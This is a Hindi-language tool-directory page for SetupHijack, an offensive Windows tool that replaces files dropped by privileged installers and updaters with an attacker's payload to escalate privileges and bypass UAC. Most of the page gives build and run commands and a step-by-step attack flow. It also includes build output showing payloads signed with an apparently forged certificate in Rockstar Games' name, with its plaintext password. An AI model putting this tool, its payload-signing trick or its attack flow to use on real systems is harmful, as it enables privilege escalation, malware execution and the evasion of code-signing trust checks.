Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SetupHijack — SetupHijack एक सुरक्षा अनुसंधान उपकरण है जो Windows अनुप्रयोगों की इंस्टॉलर और अपडेट प्रक्रियाओं में रेस कंडीशन और असुरक्षित फ़ाइल हैंडलिंग का शोषण करता है। | Kitploit
उपकरण/GitHubGitHub/hackerhouse-opensource/setuphijack
विशेषाधिकार वृद्धिपेलोड जनरेशनशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack एक सुरक्षा अनुसंधान उपकरण है जो Windows अनुप्रयोगों की इंस्टॉलर और अपडेट प्रक्रियाओं में रेस कंडीशन और असुरक्षित फ़ाइल हैंडलिंग का शोषण करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
26429148 महीने पहलेKitploit द्वारा समीक्षित

SetupHijack


अवलोकन

SetupHijack एक सुरक्षा अनुसंधान उपकरण है जो Windows इंस्टॉलर और अपडेट प्रक्रियाओं में रेस कंडीशन और असुरक्षित फ़ाइल हैंडलिंग का शोषण करता है। यह उन परिदृश्यों को लक्षित करता है जहां विशेषाधिकार प्राप्त इंस्टॉलर या अपडेटर %TEMP% या अन्य विश्व-लेखनीय स्थानों में फ़ाइलें ड्रॉप करते हैं, जिससे हमलावर उच्च विशेषाधिकारों के साथ निष्पादित होने से पहले इन फ़ाइलों को बदल सकता है।

  • चलाने के लिए उन्नत अनुमतियों की आवश्यकता नहीं होती।
  • फ़ाइल सिस्टम नोटिफिकेशन का उपयोग नहीं करता (परिवर्तनों के लिए पोल करता है)।
  • Authenticode कोड साइनिंग और इंस्टॉलर ट्रस्ट मॉडल की कमजोरियों का शोषण करता है।
  • .exe, .msi और बैच फ़ाइलों (जैसे, sysinfo, netstat, ipconfig) को संक्रमित कर सकता है।
  • केवल रेड टीम, पेनेट्रेशन टेस्टिंग और सुरक्षा अनुसंधान उपयोग के लिए डिज़ाइन किया गया है।

इस उपकरण का अभीष्ट उपयोग किसी समझौता किए गए उपयोगकर्ता खाते पर विशेषाधिकारों के साथ पृष्ठभूमि में चलाना है, ताकि इंस्टॉलर/अपडेटर फ़ाइल ड्रॉप्स को हाईजैक करके किसी अन्य प्रक्रिया को एलिवेट किया जा सके।

नीचे दिया गया चार्ट इस शोषण के वास्तविक-विश्व उदाहरण उपयोग-मामलों को कई परिदृश्यों में दर्शाता है जिनका उपयोग UAC बायपास के लिए किया जा सकता है। Adminless के तहत चलने पर UAC बायपास को एक सुरक्षा सीमा माना जाता है और सुरक्षा नियंत्रणों को अक्षम करने के लिए यह एक सामान्य "हमलावर आवश्यकता" है। विशेषाधिकार प्राप्त Administrator संचालन का शोषण दुर्भावनापूर्ण कोड के लिए साइड-लोड करने या प्रक्रिया विशेषाधिकारों को बढ़ाने हेतु सामान्य शोषण पहुंच प्रदान करता है। इस उपकरण का उपयोग उन अतिरिक्त अनुप्रयोगों की पहचान करने के लिए किया जा सकता है जो समान प्रकार के जोखिमों के संपर्क में हैं; एक हमलावर उपयोगकर्ता व्यवहार को बाधित किए बिना उन्नत अधिकार प्राप्त करने के साधन के रूप में इन प्रक्रियाओं के निष्पादन की प्रतीक्षा कर सकता है।

SetupHijack Vulnerability Discovery Chart

यह कैसे काम करता है

  1. SetupHijack नए या संशोधित इंस्टॉलर फ़ाइलों के लिए %TEMP% (और उपनिर्देशिकाओं) को लगातार स्कैन करता है।
  2. जब कोई लक्षित फ़ाइल का पता चलता है, तो इसे उपयोगकर्ता-आपूर्ति पेलोड (EXE, MSI, या BAT) से बदल दिया जाता है, वैकल्पिक रूप से मूल को .bak फ़ाइल के रूप में सुरक्षित रखते हुए।
  3. यदि विशेषाधिकार प्राप्त प्रक्रिया अखंडता जांच से पहले बदली गई फ़ाइल को निष्पादित करती है, तो पेलोड उन्नत अधिकारों (जैसे, SYSTEM या Administrator) के साथ चलता है।
  4. उपकरण सभी क्रियाओं को लॉग करता है और समान फ़ाइलों को पुनः संक्रमित करने से बचने के लिए एक स्किपलिस्ट बनाए रखता है।

कोड साइनिंग नोट

यह प्रोजेक्ट पेलोड और इंस्टॉलरों पर हस्ताक्षर करने के लिए SignToolEx.exe और SignToolExHook.dll के साथ एक हैक किए गए कोड-साइनिंग प्रक्रिया का उपयोग करता है। मान्य कोड-साइनिंग प्रमाणपत्र और एक Authenticode टाइमस्टैम्प का उपयोग करने से इंस्टॉलर और OS ट्रस्ट जांचों को बायपास करने में आपकी सफलता दर बढ़ जाएगी।


उपयोग

बिल्ड```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

### चलाएँ (विकल्प)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • SetupHijack.exe को किसी विशेषाधिकार प्राप्त इंस्टॉल/अपडेट प्रक्रिया से पहले या उसके दौरान चलाएँ।
  • डिफ़ॉल्ट रूप से, टूल सभी सामान्य ड्रॉप स्थानों को स्कैन करता है: %TEMP%, %APPDATA%, और %USERPROFILE%\Downloads।
  • आप -notemp, -noappdata, या -nodownloads फ़्लैग्स के साथ किसी भी स्थान को अक्षम कर सकते हैं।
  • clean फ़्लैग सभी सक्षम स्थानों में बैकअप पुनर्स्थापित करता है। verbose फ़्लैग सभी क्रियाओं को लॉग करता है।
  • रिमोट एस्केलेशन के लिए, टर्मिनल सर्विसेज़ पर shadow.exe या समान टूल्स के साथ उपयोग करें।

उदाहरण आक्रमण प्रवाह

  1. अपना पेलोड और SetupHijack बनाएँ: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
  2. SetupHijack प्रारंभ करें: ```sh SetupHijack.exe
  3. लक्षित इंस्टॉलर या अपडेट प्रक्रिया को व्यवस्थापक के रूप में लॉन्च करें।
  4. यदि इंस्टॉलर %TEMP% में फ़ाइलें छोड़ता है और उन्हें उन्नत अधिकारों के साथ निष्पादित करता है, तो आपका पेलोड प्रतिस्थापित होकर चलाया जाएगा।

उदाहरण आउटपुट

नीचे SetupHijack के निर्माण और चलाने का एक वास्तविक उदाहरण दिया गया है, जिसमें कोड साइनिंग और संक्रमण आउटपुट शामिल है:``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

टूल डाउनलोड करें